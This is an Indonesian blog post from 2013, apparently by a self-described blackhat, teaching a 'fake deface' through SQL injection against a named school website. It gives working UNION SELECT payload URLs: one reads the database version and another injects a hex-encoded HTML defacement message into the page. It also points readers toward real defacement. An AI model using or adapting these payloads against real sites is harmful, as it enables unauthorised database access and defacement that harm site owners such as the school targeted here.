Thursday, October 3, 2013

Deface Palsu via SQL Injection

pertama,jadi yg kita lakuakn cm deface palsu...deface yg hanya bs d baca dr sisi client,seperti XSS..gmn crnya ?lnjut ..

1.Siapin target ,mau SQL versi 4 atau versi 5 jg boleh.kl lupa nihh
2.nah misalnya udah dapet target nih [http://www.sttheresia-jkt.sch.id/home.php?t=tk&i=4]
3.cek versinya... [http://www.sttheresia-jkt.sch.id/home.php?t=tk&i=-4 union select 1,@@version,3,4,5,6--]

Web Diatas Versinya 5 , Tapi Kalo Nemu Versi 4 Juga Jangan Khawatir Yee ..
drpd cape ngeblind..
yaudah buat gaya2an..
deface palsu ajaa..
kalian tw kan yg ngerubah ascii jd hex code?

nah coba buat script deface,misal <h1>Ini Hanya Untuk Demo Dari Tutorial Gua Yang Deface Palsu.. hahahahahaha<br><br><br>By BLACK32HIDDEN From BANDUNG BLACKHAT</h1>

masukin ke bagian ASCII yg ada d web dieq41..

trus kl ud d masukin..liat bagian hexadecimal,bakal muncul: 3C68313E496E692048616E796120556E74756B2044656D6F2044617269205475746F7269616C204775612059616E67204465666163652050616C73752E2E206861686168616861686168613C62723E3C62723E3C62723E427920424C41434B333248494444454E2046726F6D2042414E44554E4720424C41434B4841543C2F68313E

nah kode d atas tuh kodehasil convert dr ascii ke hex..

nah,,skrg yg kode 3C68313E496E692048616E796120556E74756B2044656D6F2044617269205475746F7269616C204775612059616E67204465666163652050616C73752E2E206861686168616861686168613C62723E3C62723E3C62723E427920424C41434B333248494444454E2046726F6D2042414E44554E4720424C41434B4841543C2F68313E ditambah 0x d depannya ...jadi 0x3C68313E496E692048616E796120556E74756B2044656D6F2044617269205475746F7269616C204775612059616E67204465666163652050616C73752E2E206861686168616861686168613C62723E3C62723E3C62723E427920424C41434B333248494444454E2046726F6D2042414E44554E4720424C41434B4841543C2F68313E

oke,coba masukin d angka 3 ,yg script hex nyaa..
http://www.sttheresia-jkt.sch.id/home.php?t=tk&i=-4 union select 1,0x3C68313E496E692048616E796120556E74756B2044656D6F2044617269205475746F7269616C204775612059616E67204465666163652050616C73752E2E206861686168616861686168613C62723E3C62723E3C62723E427920424C41434B333248494444454E2046726F6D2042414E44554E4720424C41434B4841543C2F68313E,3,4,5,6--

ew.kok ada hacked by me?hhe..itu tandanya udah berhasil sob..

makanya ak bilang ini cm client aja..ask : kl mau deface bneran?yaudah gawei dewek ..kan ad tutor sql injectionnya tuh..

ok sob smua,makasih2.